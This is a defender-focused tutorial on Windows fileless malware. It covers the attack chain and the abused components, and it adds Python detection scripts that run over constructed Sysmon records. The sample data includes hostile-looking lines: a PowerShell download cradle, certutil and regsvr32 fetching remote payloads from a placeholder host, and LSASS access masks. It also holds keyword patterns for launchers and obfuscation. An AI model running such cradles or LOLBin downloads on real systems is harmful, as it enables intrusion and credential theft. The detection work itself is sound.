Fileless malware is one of the most misunderstood topics in security.
It doesn’t mean “no artifacts.” It means attackers minimize traditional malware on disk and instead execute through memory + trusted Windows tooling (PowerShell, WMI, LOLBins, scheduled tasks, registry, and more). That tradecraft makes classic “scan the EXE” defenses less effective.
This guide is designed for practitioners and curious builders: you’ll get a clean mental model, the full attack chain, and the essential Windows/Microsoft components fileless attacks commonly abuse.
What you’ll learn
- A practical definition of fileless malware (and what it is not)
- The typical fileless attack chain from initial access to impact
- The Windows components attackers commonly abuse (PowerShell, WMI, LOLBins, registry, tasks, memory injection)
- A defender checklist: what to log, what to hunt, and what to harden
Fileless malware in one sentence
Fileless malware is malicious behavior that runs primarily in memory and/or through legitimate system tools, leaving fewer traditional malicious files on disk.
What it’s not
- Not “undetectable.” It’s detectable with the right telemetry.
- Not always “no files ever.” Many intrusions are hybrid: a small dropper or macro kicks things off, then later stages go fileless.
The fileless attack chain (end-to-end)
Think of fileless tradecraft as a chain. If you can see the chain, you can break it.
1) Initial access
Common starting points:
- Phishing (credential theft or script execution)
- Exploited public-facing apps (VPN, web apps, appliances)
- Malicious documents or HTML attachments that launch scripts
- Stolen credentials + MFA fatigue / token theft
Why it matters: fileless behavior often shows up after initial access. The entry point can look ordinary.
2) Execution (without a classic EXE)
Attackers try to execute through trusted binaries:
- PowerShell download cradles (fetch + execute in memory)
- mshta / rundll32 / regsvr32 as launchers
- WMI process creation
- Script engines (wscript/cscript)
Defender signal: suspicious parent/child process chains (Office → PowerShell is the classic).
3) Discovery
Once running, attackers enumerate:
- User context, privileges, domain membership
- Security tooling present
- Network shares, high-value hosts
Often done with:
- PowerShell cmdlets
- WMI queries
- Native commands (whoami, nltest, net, ipconfig)
4) Credential access
Fileless intrusions frequently aim to turn “one endpoint” into “org-wide access”:
- LSASS access and credential dumping (opening a handle to lsass.exe and reading its memory, often from a tool that itself lives only in memory)
- Token theft / session hijacking
- Browser credential extraction
- Kerberos abuse in advanced cases
5) Persistence
Instead of installing a new service binary, fileless persistence often uses:
- Registry Run keys
- Scheduled tasks
- WMI event subscriptions
- Startup scripts
6) Defense evasion
Common patterns:
- PowerShell/script obfuscation (string splitting, encoding, aliases) to defeat keyword matching
- Living-off-the-land to avoid dropping binaries that security tooling would scan
- Reducing telemetry where privileges allow (for example disabling PowerShell logging or clearing event logs)
7) Command & control (C2)
Even fileless attacks need comms:
- HTTPS to attacker infrastructure that blends in (cloud hosting, CDNs, reputable-looking domains)
- Beaconing patterns (regular intervals)
- Sometimes legitimate services used for staging
8) Lateral movement
Often done with:
- Remote PowerShell
- WMI remote execution
- SMB admin shares
- RDP with stolen creds
9) Actions on objectives
- Data theft
- Ransomware deployment (often not fileless at the final stage)
- Long-term persistence for espionage
The essential Windows components fileless attacks abuse
Here’s the “parts list.” If you understand these components, fileless malware stops feeling mysterious.
A) PowerShell
Why attackers love it: powerful, flexible, ubiquitous.
Common abuse patterns:
- -EncodedCommand (base64 of the script as UTF-16LE, which hides the script from a casual look at the command line; any unambiguous prefix such as -e or -enc works)
- Download + execute in memory (a "cradle": fetch a script over HTTP and pass it straight to Invoke-Expression, so nothing is written to disk)
- Obfuscation and string manipulation (concatenation, backticks, aliases, FromBase64String) to defeat keyword matching
Defender ideas:
- Baseline normal PowerShell usage
- Alert on Office → PowerShell
- Watch for unusual outbound connections from PowerShell
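The encoded-command and download-cradle patterns above, together with the Office → PowerShell chain from the execution step of the attack chain, as detection logic you can run over process-creation telemetry. This is an added example, not code from the original page: it runs over constructed Sysmon-style Event ID 1 records (ParentImage, Image, CommandLine), so the field names, the `example.invalid` host, the Office parent list and the scoring thresholds are assumptions to tune against your own baseline.

```python
import base64
import re
from pathlib import PureWindowsPath

# Office hosts whose child PowerShell is almost never legitimate
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Traits of an in-memory download cradle or of a launcher trying to stay quiet
CRADLE_PATTERNS = {
    "download": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-RestMethod"),
    "invoke":   re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "decode":   re.compile(r"(?i)FromBase64String"),
    "hidden":   re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-noni(?:nteractive)?\b"),
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")


def encode_command(script: str) -> str:
    """Build what -EncodedCommand expects: base64 of the script as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    for m in ENCODED_FLAG.finditer(cmdline):
        if not "encodedcommand".startswith(m.group(1).lower()):
            continue  # e.g. -ExecutionPolicy: same first letter, different parameter
        blob = m.group(2)
        blob += "=" * (-len(blob) % 4)  # tolerate padding stripped by the attacker or by log truncation
        try:
            return base64.b64decode(blob).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def analyze(event: dict) -> dict:
    """Score one process-creation event: decode the payload, then look at parent and cradle traits."""
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    hits = sorted(name for name, rx in CRADLE_PATTERNS.items() if rx.search(text))
    office_parent = PureWindowsPath(event["ParentImage"]).name.lower() in OFFICE_PARENTS
    # Office -> PowerShell is enough on its own. Otherwise require more than one cradle trait,
    # or an encoded command whose decoded text shows a trait: encoded commands by themselves
    # are common in legitimate management tooling and would drown the queue in alerts.
    suspicious = office_parent or len(hits) >= 2 or (decoded is not None and bool(hits))
    return {"decoded": decoded, "indicators": hits, "office_parent": office_parent, "suspicious": suspicious}


def triage(events: list) -> list:
    """Return only the events worth an analyst's time, with the verdict attached."""
    flagged = []
    for ev in events:
        verdict = analyze(ev)
        if verdict["suspicious"]:
            flagged.append({"Image": ev["Image"], "ParentImage": ev["ParentImage"], **verdict})
    return flagged


# Constructed Sysmon Event ID 1 style records (not real telemetry); example.invalid is a reserved name
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc " + encode_command(CRADLE)},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\Get-Inventory.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "IEX (iwr http://example.invalid/x)"'},
]

if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(hit["ParentImage"], "->", hit["Image"], hit["indicators"], hit["decoded"])
```

Two design points worth copying into a real rule: decode before you match (the cradle in the first record is invisible in the raw command line), and match the parameter by prefix rather than by the literal string `-EncodedCommand`, because attackers use the shortest spelling that still works.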
B) WMI (Windows Management Instrumentation)
Why it’s abused: remote execution + stealthy persistence.
Common abuse patterns:
- Remote process execution
- WMI event subscriptions (persistence)
Defender ideas:
- Hunt for unusual WMI consumers/filters
- Watch WMI spawning processes unexpectedly
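A hunt for the WMI event-subscription persistence described above, reconstructing filter → consumer bindings from telemetry. This is an added example, not code from the original page. The records are constructed and modeled on the fields Sysmon writes for Event IDs 19 (filter), 20 (consumer) and 21 (binding); the benign SCM event-log subscription is included because it exists by default on Windows and a rule that fires on it is useless. Consumer types, launcher patterns and trigger patterns are assumptions to extend.

```python
import re

# Consumer types that execute attacker-supplied code; the others (event log, SMTP) mostly cannot
CODE_EXEC_CONSUMERS = {"command line", "script"}
LAUNCHERS = re.compile(r"(?i)powershell|pwsh|mshta|wscript|cscript|cmd\.exe|rundll32|regsvr32|certutil|bitsadmin")
# Triggers favoured for persistence: "N seconds after boot", process starts, new logon sessions
PERSISTENCE_TRIGGERS = re.compile(
    r"(?i)Win32_PerfFormattedData_PerfOS_System|Win32_ProcessStartTrace|Win32_LogonSession"
    r"|__InstanceCreationEvent|__InstanceModificationEvent")
# Sysmon writes binding references as Class.Name="value"
REF = re.compile(r'(\w+)\.Name="([^"]+)"')


def parse_ref(ref: str) -> str:
    """Extract the instance name from a binding reference such as __EventFilter.Name="Updater"."""
    m = REF.search(ref)
    return m.group(2) if m else ref


def hunt_wmi_subscriptions(events: list) -> list:
    """Rebuild filter -> consumer bindings from EID 19/20/21 records and score each binding."""
    filters, consumers, findings = {}, {}, []
    for ev in events:
        if ev["EventID"] == 19 and ev["Operation"] == "Created":
            filters[ev["Name"]] = ev
        elif ev["EventID"] == 20 and ev["Operation"] == "Created":
            consumers[ev["Name"]] = ev
    for ev in events:
        if ev["EventID"] != 21 or ev["Operation"] != "Created":
            continue
        fname, cname = parse_ref(ev["Filter"]), parse_ref(ev["Consumer"])
        flt, consumer = filters.get(fname), consumers.get(cname)
        reasons = []
        if flt is None or consumer is None:
            # The binding is the part attackers cannot skip. A dangling reference usually means
            # the filter/consumer predates logging or the creation events were lost: still a lead.
            reasons.append("binding references a filter or consumer not seen in telemetry")
        else:
            if consumer["Type"].lower() in CODE_EXEC_CONSUMERS:
                reasons.append(f"{consumer['Type']} consumer executes code")
            if LAUNCHERS.search(consumer["Destination"]):
                reasons.append("consumer launches a script host or LOLBin")
            if PERSISTENCE_TRIGGERS.search(flt["Query"]):
                reasons.append("filter uses a persistence-style trigger")
        if reasons:
            findings.append({"filter": fname, "consumer": cname, "user": ev["User"], "reasons": reasons})
    return findings


# Constructed records (not real telemetry). "SQBFAFgA" is the UTF-16LE base64 of "IEX".
WMI_EVENTS = [
    {"EventID": 19, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM", "EventNamespace": "root\\cimv2",
     "Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Name": "SCM Event Log Consumer", "Type": "NT Event Log", "Destination": ""},
    {"EventID": 21, "Operation": "Created", "User": "NT AUTHORITY\\SYSTEM",
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
    {"EventID": 19, "Operation": "Created", "User": "CORP\\jdoe", "EventNamespace": "root\\cimv2",
     "Name": "Updater",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"EventID": 20, "Operation": "Created", "User": "CORP\\jdoe",
     "Name": "Updater", "Type": "Command Line", "Destination": "powershell.exe -NoP -W Hidden -enc SQBFAFgA"},
    {"EventID": 21, "Operation": "Created", "User": "CORP\\jdoe",
     "Consumer": 'CommandLineEventConsumer.Name="Updater"', "Filter": '__EventFilter.Name="Updater"'},
]

if __name__ == "__main__":
    for finding in hunt_wmi_subscriptions(WMI_EVENTS):
        print(finding)
```

The "uptime between N seconds" filter is worth knowing on sight: it fires once shortly after every boot, which is exactly the behaviour a Run key would give without touching the registry. Scoring the binding rather than filters or consumers in isolation keeps the noise from the many legitimate filters that never get bound to a code-executing consumer.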
C) LOLBins (Living-Off-The-Land Binaries)
Legitimate binaries used as launchers:
- rundll32
- regsvr32
- mshta
- certutil
- bitsadmin (legacy but still seen)
Defender ideas:
- Alert on LOLBins making outbound connections
- Watch for LOLBins executing scripts or pulling remote content
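The two defender ideas above, LOLBins making outbound connections and LOLBins being pointed at remote content, as one correlation over process and network telemetry. This is an added example, not code from the original page: it joins constructed Sysmon-style Event ID 1 (process create) and Event ID 3 (network connect) records on ProcessGuid, so the field names, the LOLBin list and the sample destinations (203.0.113.0/24 and `example.invalid` are reserved for documentation) are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Signed Windows binaries commonly used as launchers or downloaders. Most have legitimate
# uses, so the alert condition is "LOLBin + network", never the binary on its own.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe", "bitsadmin.exe",
           "msiexec.exe", "wscript.exe", "cscript.exe", "installutil.exe", "msbuild.exe"}
# A URL or UNC path on the command line means the binary is being handed remote content
REMOTE_CONTENT = re.compile(r"(?i)\b(?:https?|ftp)://|\\\\[\w.-]+\\")


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def correlate_lolbin_network(events: list) -> dict:
    """Join EID 1 and EID 3 on ProcessGuid; return {ProcessGuid: finding} for LOLBins that
    reached out to the network or were given remote content on the command line. The second
    condition matters because the network event itself is sometimes missed or filtered."""
    procs = {ev["ProcessGuid"]: ev for ev in events if ev["EventID"] == 1}
    findings = {}

    def add(guid, reason):
        proc = procs.get(guid)
        if proc is None or basename(proc["Image"]) not in LOLBINS:
            return  # not a LOLBin, or we never saw it start: nothing to attribute
        f = findings.setdefault(guid, {"Image": proc["Image"], "CommandLine": proc["CommandLine"],
                                       "ParentImage": proc["ParentImage"], "reasons": []})
        f["reasons"].append(reason)

    for guid, proc in procs.items():
        if REMOTE_CONTENT.search(proc["CommandLine"]):
            add(guid, "remote content on command line")
    for ev in events:
        if ev["EventID"] == 3 and ev.get("Initiated", False):
            add(ev["ProcessGuid"], f"outbound connection to {ev['DestinationIp']}:{ev['DestinationPort']}")
    return findings


# Constructed Sysmon-style records (not real telemetry); ProcessGuids shortened for readability
EVENTS = [
    {"EventID": 1, "ProcessGuid": "{G1}", "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/p.txt C:\Users\jdoe\AppData\Local\Temp\p.txt"},
    {"EventID": 3, "ProcessGuid": "{G1}", "Image": r"C:\Windows\System32\certutil.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 80, "Initiated": True},
    {"EventID": 1, "ProcessGuid": "{G2}", "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl"},
    {"EventID": 1, "ProcessGuid": "{G3}", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:https://example.invalid/f.sct scrobj.dll"},
    {"EventID": 3, "ProcessGuid": "{G3}", "Image": r"C:\Windows\System32\regsvr32.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443, "Initiated": True},
    {"EventID": 1, "ProcessGuid": "{G4}", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs -p"},
    {"EventID": 3, "ProcessGuid": "{G4}", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443, "Initiated": True},
]

if __name__ == "__main__":
    for guid, finding in correlate_lolbin_network(EVENTS).items():
        print(guid, finding["Image"], finding["reasons"])
```

The rundll32 record that opens a Control Panel applet is the kind of thing that makes "alert on every rundll32" unworkable; it has no URL and no socket, so it produces nothing here. svchost.exe talks to the network constantly and is not a LOLBin, so it is excluded by the list rather than by a special case.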
D) Script engines (wscript/cscript) and HTA
Why they’re abused: VBScript/JScript and HTA files run without compilation, can be launched from documents, shortcuts and attachments, and mshta.exe can even fetch the HTA from a URL.
Defender ideas:
- Monitor scripts executed from user-writable paths
- Flag Office/email clients spawning script engines
E) Memory injection / process hollowing
This is where “fileless” becomes truly in-memory:
- Code injected into a legitimate process (open a handle, write the payload, start a thread in it)
- Process hollowing (start a legitimate process suspended, replace its image in memory with the payload, then resume it)
Defender ideas:
- Watch for suspicious process access patterns
- Correlate unusual parent/child trees with injection telemetry
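The "suspicious process access patterns" above, and the LSASS handle-opening from the credential access step of the attack chain, as detection logic over process-access telemetry. This is an added example, not code from the original page: it reads constructed Sysmon-style Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread) records, decodes the GrantedAccess mask with the PROCESS_* right values from winnt.h, and applies an illustrative allow-list of processes expected to read LSASS. Field names, the allow-list and the sample call traces are assumptions.

```python
from pathlib import PureWindowsPath

# Subset of PROCESS_* access rights (winnt.h) that matter for dumping and injection
ACCESS_RIGHTS = {
    0x0002: "CREATE_THREAD", 0x0008: "VM_OPERATION", 0x0010: "VM_READ", 0x0020: "VM_WRITE",
    0x0040: "DUP_HANDLE", 0x0400: "QUERY_INFORMATION", 0x1000: "QUERY_LIMITED_INFORMATION",
}
INJECTION_BITS = 0x0002 | 0x0008 | 0x0020   # create thread + change protections + write memory
# Illustrative allow-list of processes expected to read LSASS; build yours from a baseline
LSASS_READERS = {"msmpeng.exe", "csrss.exe", "wininit.exe"}
# Sources that should never be starting threads in other processes
INJECTION_SOURCES = {"powershell.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
                     "wscript.exe", "cscript.exe", "winword.exe", "excel.exe"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def decode_access(granted: str) -> list:
    """Turn Sysmon's hex GrantedAccess string (e.g. '0x1010') into named rights."""
    mask = int(granted, 16)
    return [name for bit, name in ACCESS_RIGHTS.items() if mask & bit]


def analyze_process_access(ev: dict) -> dict:
    """EID 10: who opened a handle to whom, with which rights, and from what kind of code."""
    src, tgt = basename(ev["SourceImage"]), basename(ev["TargetImage"])
    mask = int(ev["GrantedAccess"], 16)
    reasons = []
    if tgt == "lsass.exe" and mask & 0x0010 and src not in LSASS_READERS:
        reasons.append("opens LSASS with VM_READ (credential dumping primitive)")
    # parentheses matter: == binds tighter than & in Python
    if src != tgt and (mask & INJECTION_BITS) == INJECTION_BITS:
        reasons.append("write and thread-creation rights on another process (injection primitive)")
    if "UNKNOWN" in ev.get("CallTrace", ""):
        reasons.append("call stack passes through memory not backed by any module")
    return {"source": src, "target": tgt, "rights": decode_access(ev["GrantedAccess"]), "reasons": reasons}


def analyze_remote_thread(ev: dict) -> dict:
    """EID 8: a thread started in another process; an unbacked start address is the tell."""
    src, tgt = basename(ev["SourceImage"]), basename(ev["TargetImage"])
    reasons = []
    if not ev.get("StartModule"):
        reasons.append("remote thread start address is not inside any loaded module")
    if src in INJECTION_SOURCES:
        reasons.append(f"remote thread created by {src}")
    return {"source": src, "target": tgt, "rights": [], "reasons": reasons}


def triage(events: list) -> list:
    """Return the verdicts that carry at least one reason."""
    out = []
    for ev in events:
        verdict = analyze_process_access(ev) if ev["EventID"] == 10 else analyze_remote_thread(ev)
        if verdict["reasons"]:
            out.append(verdict)
    return out


# Constructed Sysmon-style records (not real telemetry); offsets and addresses are made up
EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d3e4|UNKNOWN(00007FF8A0001234)"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d3e4|C:\Windows\System32\KERNELBASE.dll+2a1b3"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x143a",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d3e4|C:\Windows\System32\KERNELBASE.dll+2a1b3"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartAddress": "0x000001F2C4A20000",
     "StartModule": "", "StartFunction": ""},
]

if __name__ == "__main__":
    for verdict in triage(EVENTS):
        print(verdict)
```

0x1010 (VM_READ plus QUERY_LIMITED_INFORMATION) is the minimum a dumper needs to read LSASS, which is why it shows up so often; the second record shows that the same mask from an expected reader produces nothing. The UNKNOWN frame in a call trace is a separate signal: code that is not backed by a file on disk is exactly what this page is about.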
F) Registry
Used for:
- Persistence (Run keys)
- Storing encoded payloads/config
Defender ideas:
- Monitor changes to Run keys
- Flag unusual registry writes by scripts/Office
G) Scheduled Tasks
Used for reliable persistence:
- Tasks that execute PowerShell/LOLBins
Defender ideas:
- Alert on new tasks created by unusual accounts
- Review tasks that run from user directories
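The registry and scheduled-task checks from sections F and G as one piece of detection logic, since both come down to the same question: what command does this persistence entry launch, and who wrote it. This is an added example, not code from the original page. The registry side reads constructed Sysmon-style Event ID 13 (registry value set) records; the task side parses a constructed task definition in the XML format that `schtasks /query /xml` emits, using the task schema namespace. Path patterns, launcher lists and the "writers of interest" set are assumptions to tune.

```python
import re
import xml.etree.ElementTree as ET

LAUNCHER = re.compile(r"(?i)\b(?:powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|cmd)(?:\.exe)?\b")
OBFUSCATION = re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|-w(?:indowstyle)?\s+hidden|FromBase64String|\bIEX\b")
USER_WRITABLE = re.compile(r"(?i)\\(?:AppData|Temp|Downloads|Public|ProgramData)\\|%(?:APPDATA|TEMP|TMP|LOCALAPPDATA)%")
RUN_KEY = re.compile(r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\")
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")
# Processes that have no business writing autostart entries or stashing payloads
WRITERS_OF_INTEREST = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                       "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


def launch_reasons(command: str) -> list:
    """Why a persisted command line deserves a look; shared by the registry and task checks."""
    reasons = []
    if LAUNCHER.search(command):
        reasons.append("runs a script host or LOLBin")
    if OBFUSCATION.search(command):
        reasons.append("hidden window or encoded payload")
    if USER_WRITABLE.search(command):
        reasons.append("references a user-writable path")
    return reasons


def hunt_registry(events: list) -> list:
    """EID 13 records: Run/RunOnce persistence, plus base64 blobs stored by script hosts."""
    findings = []
    for ev in events:
        if ev["EventID"] != 13:
            continue
        writer = ev["Image"].rsplit("\\", 1)[-1].lower()
        reasons = []
        if RUN_KEY.search(ev["TargetObject"]):
            reasons = launch_reasons(ev["Details"])
            if writer in WRITERS_OF_INTEREST:
                reasons.append(f"autostart entry written by {writer}")
        elif writer in WRITERS_OF_INTEREST and BASE64_BLOB.match(ev["Details"]):
            reasons.append(f"{writer} stored a base64 blob ({len(ev['Details'])} chars) in the registry")
        if reasons:
            findings.append({"key": ev["TargetObject"], "value": ev["Details"], "reasons": reasons})
    return findings


def hunt_task_xml(task_xml: str) -> dict:
    """Inspect one task definition for script persistence: what it runs, when, and as whom."""
    root = ET.fromstring(task_xml)
    actions, reasons = [], []
    for exe in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = (exe.findtext("t:Command", default="", namespaces=TASK_NS) + " "
               + exe.findtext("t:Arguments", default="", namespaces=TASK_NS)).strip()
        actions.append(cmd)
        reasons.extend(launch_reasons(cmd))
    trig = root.find("t:Triggers", TASK_NS)
    triggers = [] if trig is None else [child.tag.split("}")[-1] for child in trig]
    principal = root.findtext(".//t:Principals/t:Principal/t:UserId", default="", namespaces=TASK_NS)
    return {"principal": principal, "triggers": triggers, "actions": actions, "reasons": reasons}


# Constructed records (not real telemetry). The SID and the vendor path are placeholders.
REGISTRY_EVENTS = [
    {"EventID": 13, "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneSync",
     "Details": r"wscript.exe //B C:\Users\jdoe\AppData\Roaming\OneSync.vbs"},
    {"EventID": 13, "Image": r"C:\Program Files\VendorApp\Setup.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r"C:\Program Files\VendorApp\Tray.exe /autostart"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKCU\Software\AppDataLow\Config\Blob",
     "Details": "SQBFAFgA" * 10},
]
TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>CORP\\jdoe</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>CORP\\jdoe</UserId></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
    <Arguments>-NoP -W Hidden -File C:\\Users\\jdoe\\AppData\\Roaming\\sync.ps1</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for finding in hunt_registry(REGISTRY_EVENTS):
        print(finding)
    print(hunt_task_xml(TASK_XML))
```

The vendor tray application in the second registry record is the ordinary case a Run-key rule has to tolerate: a signed installer writing a path under Program Files with no script host involved. What separates the first record is not the key but the combination of writer (Office) and payload (a script engine pointed at AppData).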
H) Office + browsers
Often involved in:
- Launching initial scripts
- Credential/token targeting
Defender ideas:
- Watch Office spawning PowerShell/cmd/wscript
- Monitor unusual access to browser credential stores
I) Identity and cloud tokens (modern “fileless”)
Some attacks are “fileless” because the attacker doesn’t need malware at all:
- Stolen session tokens
- OAuth app abuse
- MFA fatigue
Defender ideas:
- Monitor risky sign-ins and impossible travel
- Audit OAuth consent grants
Defender checklist (what to do next)
1) Get the right visibility
- Collect process creation + command-line telemetry
- Enable PowerShell logging where appropriate (script block/module logging)
- Centralize Windows logs into your SIEM
- Monitor identity events (sign-ins, conditional access, risky users)
2) Hunt the highest-signal behaviors
- Office → PowerShell chains
- Encoded PowerShell commands
- LOLBins with outbound network connections
- New scheduled tasks executing scripts
- WMI persistence artifacts
3) Reduce the attack surface
- Reduce local admin usage
- Constrain scripting where feasible
- Apply application control where appropriate
- Patch aggressively (initial access often exploits known vulns)
Common mistakes
- Treating “fileless” as “no evidence.” It’s “different evidence.”
- Over-alerting on all PowerShell. Baselines matter.
- Ignoring identity. Token theft and OAuth abuse are increasingly common.
Actionable next steps
- Pick your top 5 suspicious process chains to monitor.
- Validate you’re collecting command-line + PowerShell telemetry.
- Build detections for LOLBins + outbound connections.
- Review persistence mechanisms: tasks, registry, WMI.
- Run a tabletop: “What would we do if we saw fileless behavior on a domain-joined endpoint?”
Recommended training
If you want hands-on exposure to attacker tradecraft (including living-off-the-land techniques and post-exploitation behaviors), the CEHv13 course is a strong foundation:
FAQ
Is fileless malware only a Windows thing?
No, but Windows is a common target because of the rich built-in administration and scripting ecosystem.
Does fileless malware always use PowerShell?
Not always, but PowerShell is one of the most common tools used for execution and discovery.
Can EDR detect fileless malware?
Yes—especially when it captures process trees, command lines, memory behaviors, and suspicious process access.
What’s the fastest risk reduction move?
Improve visibility, reduce local admin, harden scripting, and monitor the most common suspicious execution chains.